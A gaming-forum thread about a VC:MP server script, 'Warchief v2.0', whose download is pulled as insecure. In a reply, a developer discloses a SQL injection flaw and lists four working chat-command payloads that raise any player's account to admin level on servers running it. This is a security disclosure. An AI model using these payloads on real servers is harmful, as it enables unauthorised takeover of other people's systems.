[Insecure] HTC & Clan TOR - [0.4] Warchief v2.0
[Scripts] VPT's v1.0 »

HTC

  • Newbie
  • Posts: 5
[Insecure] HTC & Clan TOR - [0.4] Warchief v2.0
« on July 25th, 2015, 01:52 PM »Last edited on July 26th, 2015, 04:35 AM by Stormeus
HTC & Clan TOR - [0.4] Warchief v2.0

Build: 10156 (Update 25/07/2015)

Language: Portuguese-BR (The English version will be available soon)

Version [0.4] Warchief 2.0 additional controls and systems* MatheuS (Country Detector, mute, unmute) - sseebbyy (Nitrous Oxide Systems) - Banaqs (Vehicle Fix Function) - JaVeD (News System) - ADM Script v1.0 (Command format: Kick and Killp) - Diego (Ban and Unban) - Beztone (Command format: Setmon) - George (Gotoloc and Saveloc) - Ksna's Cops and Robbers (Special commands)

Updates will be released to fix bugs that still exist in this version

REMOVED - INSECURE

KAKAN

  • Wiki Contributor
  • Posts: 3,347
You can contact me using Discord, at Developers.CPP( check off-board to find the invite link )
Github: https://github.com/theKAKAN

ThunderStorm

  • Newbie
  • Hello
  • Posts: 22



[VSS]Shawn

  • Full Member
  • Posts: 210

Ksna

  • Jr. Member
  • Posts: 86

KAKAN

  • Wiki Contributor
  • Posts: 3,347
You can contact me using Discord, at Developers.CPP( check off-board to find the invite link )
Github: https://github.com/theKAKAN

MatheuS

  • Wiki Contributor
  • LBR | Co-Leader & Brasil Real RPG | Developer
  • Posts: 439
Code: [Select]
if( !sucess ) tryAgain();

Joao^

  • Newbie
  • Posts: 15

Stormeus

  • VC:MP Developer
  • oh god how did i get here im not good w computer
  • Posts: 1,123
Re: HTC & Clan TOR - [0.4] Warchief v2.0
« Reply #8, on July 26th, 2015, 04:34 AM »
Quote from [VSS]Shawn on July 25th, 2015, 04:19 PM
Warchief o.0 i might think it will be remove
Well it's okay. It's just literally a straight port of the old Warchiefs (the commands still say they start with /c) but with a lot of other people's snippets duct taped onto it, but that's not a reason to take it down.

What I am going to point out is that this script is amazingly vulnerable to SQL injection. Since I'm already taking down the link because of this, here's a full disclosure:

You can easily gain admin rights on any server that runs this script by using any of these commands and rejoining:
Quote
/quote '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/buycar '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/gotoloc '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
/nogoto '; UPDATE Account SET Level = 10 WHERE Name = 'YOUR_NAME_IN_LOWERCASE';--
Virtually no user input is escaped using the escapeSQLString function in SQLite; consequently, these are a few commands that use user input and add them to the query without escaping, generating this flaw. I would absolutely not recommend using this until this script is largely fixed.

HTC

  • Newbie
  • Posts: 5